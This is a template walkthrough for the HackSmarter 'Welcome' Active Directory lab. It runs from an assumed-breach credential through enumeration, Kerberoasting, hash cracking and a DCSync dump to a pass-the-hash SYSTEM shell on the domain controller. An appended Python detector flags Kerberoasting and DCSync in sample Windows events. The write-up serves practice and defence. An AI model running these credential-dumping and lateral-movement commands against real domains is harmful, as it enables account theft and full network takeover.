# HackSmarter: Welcome — Walkthrough

su7t3 // Security Writeups

> **Lab:** Welcome  ·  **Platform:** Active Directory  ·  **Difficulty:** Easy  ·  **Provider:** HackSmarter
>
> *This is a template walkthrough — replace the placeholder values (`<DC-IP>`, hashes, flags) with your own findings as you work the box. Keep the structure; it mirrors how a real engagement is documented.*

## Overview

`Welcome` is the on-ramp to the HackSmarter Active Directory series. It's an **assumed-breach** scenario: you start with a low-privileged domain credential and work toward Domain Admin by chaining standard AD misconfigurations. The goal isn't a single trick — it's drilling the enumeration → foothold → privilege-escalation loop until it's muscle memory.

**Skills exercised**

- AD enumeration (BloodHound / ldapsearch / `nxc`)
- SMB and LDAP recon
- Credential abuse and lateral movement
- Mapping an attack path to Domain Admin

---

## 1. Recon

### 1.1 Initial port scan

Always start broad, then go deep on what's open.

```bash
# Full TCP scan, then service/version scan on discovered ports
nmap -p- --min-rate 2000 -oA nmap/alltcp <DC-IP>
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269 -sCV -oA nmap/svc <DC-IP>
```

The classic Domain Controller fingerprint: **53 (DNS), 88 (Kerberos), 389/636 (LDAP/S), 445 (SMB), 3268 (Global Catalog)**. That tells you you're looking at a DC before you've touched a single credential.

### 1.2 Pin the domain and hostname

```bash
nxc smb <DC-IP>
```

```text
SMB    <DC-IP>    445    DC01    [*] Windows Server ... (name:DC01) (domain:welcome.hacksmarter.local)
```

Add it to your hosts file so Kerberos and tooling resolve names cleanly:

```bash
echo "<DC-IP> dc01.welcome.hacksmarter.local welcome.hacksmarter.local dc01" | sudo tee -a /etc/hosts
```

---

## 2. Authenticated Enumeration

You were handed a starter credential. Validate it first:

```bash
nxc smb <DC-IP> -u 'user' -p 'password' --shares
```

> [!TIP]
> A `[+]` from `nxc` with valid creds is your green light. If you see `STATUS_LOGON_FAILURE`, recheck the username format (`user` vs `user@domain` vs `DOMAIN\user`) and clock skew (Kerberos is picky — `sudo ntpdate <DC-IP>`).

### 2.1 Collect with BloodHound

Graph the domain — it's the single highest-leverage move in any AD box.

```bash
bloodhound-python -u 'user' -p 'password' -d welcome.hacksmarter.local \
  -ns <DC-IP> -c All --zip
```

Import the zip into BloodHound and run the pre-built queries:

- *Find Shortest Paths to Domain Admins*
- *Find Principals with DCSync Rights*
- *Shortest Path from Owned Principals*

Mark your starting user as **Owned**, then let the graph show you the path.

### 2.2 Users, shares, and quick wins

```bash
# Enumerate domain users
nxc smb <DC-IP> -u 'user' -p 'password' --users

# Spider readable shares for loot (configs, scripts, creds)
nxc smb <DC-IP> -u 'user' -p 'password' -M spider_plus
```

---

## 3. Foothold / Privilege Escalation

> Document the **specific** misconfiguration you abused here. On an easy AD lab this is usually one of:
> Kerberoasting a service account, an ACL edge (e.g. `GenericWrite`/`ForceChangePassword`), or readable credentials in a share/GPO.

Example — Kerberoasting, if BloodHound flags an SPN-bearing account:

```bash
# Request service tickets for crackable hashes
impacket-GetUserSPNs welcome.hacksmarter.local/user:password -dc-ip <DC-IP> -request -outputfile spns.hash

# Crack offline
hashcat -m 13100 spns.hash /usr/share/wordlists/rockyou.txt
```

Then validate the recovered credential and move along the BloodHound path:

```bash
nxc smb <DC-IP> -u 'svc_account' -p '<cracked-password>'
```

---

## 4. Domain Admin

Once the attack path lands on a privileged principal, dump the domain and prove it:

```bash
# DCSync if you've reached an account with replication rights
impacket-secretsdump welcome.hacksmarter.local/<privileged-user>:'<password>'@<DC-IP>
```

```bash
# Pass-the-Hash to a SYSTEM shell on the DC
impacket-psexec -hashes :<NT-hash> welcome.hacksmarter.local/administrator@<DC-IP>
```

```text
nt authority\system
```

### Flags

| Flag | Location | Value |
|------|----------|-------|
| User | `C:\Users\user\Desktop\user.txt` | `REDACTED` |
| Root | `C:\Users\Administrator\Desktop\root.txt` | `REDACTED` |

---

## Lessons Learned

- **BloodHound first.** On AD, the graph turns a maze into a straight line. Always mark owned principals.
- **Credential hygiene is the vuln.** Easy AD boxes almost always hinge on a reused/weak/exposed credential, not an exploit.
- **Kerberos is time-sensitive.** Sync your clock to the DC before anything Kerberos-related.

## References

- [HackSmarter Hands-On Labs](https://www.hacksmarter.org/)
- [BloodHound docs](https://bloodhound.readthedocs.io/)
- [Impacket](https://github.com/fortra/impacket)
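The defender's side of sections 3 and 4, as an added example that is not part of the original writeup: the Kerberoasting step shows up on the DC as a burst of 4769 service-ticket requests with RC4 encryption (`TicketEncryptionType` 0x17) from one user, and a DCSync shows up as a 4662 event where a non-DC principal exercises the DS-Replication-Get-Changes extended rights. The event records below are constructed and simplified to the fields a SIEM would extract; the thresholds are assumptions to tune per environment.

```python
"""Flag Kerberoasting and DCSync patterns in simplified Windows Security events.
Added example for the HackSmarter 'Welcome' walkthrough; sample events are constructed."""
from collections import defaultdict

# Well-known extended-right GUIDs that a DCSync must hold on the domain object.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
RC4_HMAC = "0x17"  # TicketEncryptionType requested by classic Kerberoast tooling

# Constructed sample events (not real telemetry): 4769 = TGS request, 4662 = object access.
EVENTS = [
    {"id": 4769, "user": "user@WELCOME.HACKSMARTER.LOCAL", "spn": "MSSQLSvc/db01", "enc": "0x17", "ts": 100},
    {"id": 4769, "user": "user@WELCOME.HACKSMARTER.LOCAL", "spn": "HTTP/web01", "enc": "0x17", "ts": 102},
    {"id": 4769, "user": "user@WELCOME.HACKSMARTER.LOCAL", "spn": "CIFS/fs01", "enc": "0x17", "ts": 103},
    {"id": 4769, "user": "alice@WELCOME.HACKSMARTER.LOCAL", "spn": "CIFS/fs01", "enc": "0x12", "ts": 110},
    {"id": 4662, "user": "svc_account", "props": [DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL], "ts": 200},
    {"id": 4662, "user": "DC01$", "props": [DS_REPLICATION_GET_CHANGES_ALL], "ts": 201},
]


def kerberoast_suspects(events, min_spns=3, window=60):
    """Users that requested RC4 tickets for >= min_spns distinct SPNs within `window` seconds.
    Returns {user: sorted SPN list}. krbtgt requests are normal TGT traffic and are ignored."""
    by_user = defaultdict(list)
    for e in events:
        if e["id"] == 4769 and e["enc"] == RC4_HMAC and not e["spn"].lower().startswith("krbtgt"):
            by_user[e["user"]].append(e)
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(reqs):  # sliding window anchored on each request
            spns = {r["spn"] for r in reqs[i:] if r["ts"] - first["ts"] <= window}
            if len(spns) >= min_spns:
                hits[user] = sorted(spns)
                break
    return hits


def dcsync_suspects(events):
    """Non-machine principals exercising replication extended rights (4662).
    Assumption: '$' accounts are treated as DC replication traffic; a production rule
    should allow-list the actual DC computer accounts instead of all machine accounts."""
    replication = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
    return sorted({e["user"] for e in events
                   if e["id"] == 4662 and not e["user"].endswith("$") and replication & set(e["props"])})
```

Both detectors key on the same artefacts BloodHound's *Find Principals with DCSync Rights* query surfaces from the other direction, so reviewing who legitimately holds those rights is the cheapest way to cut false positives.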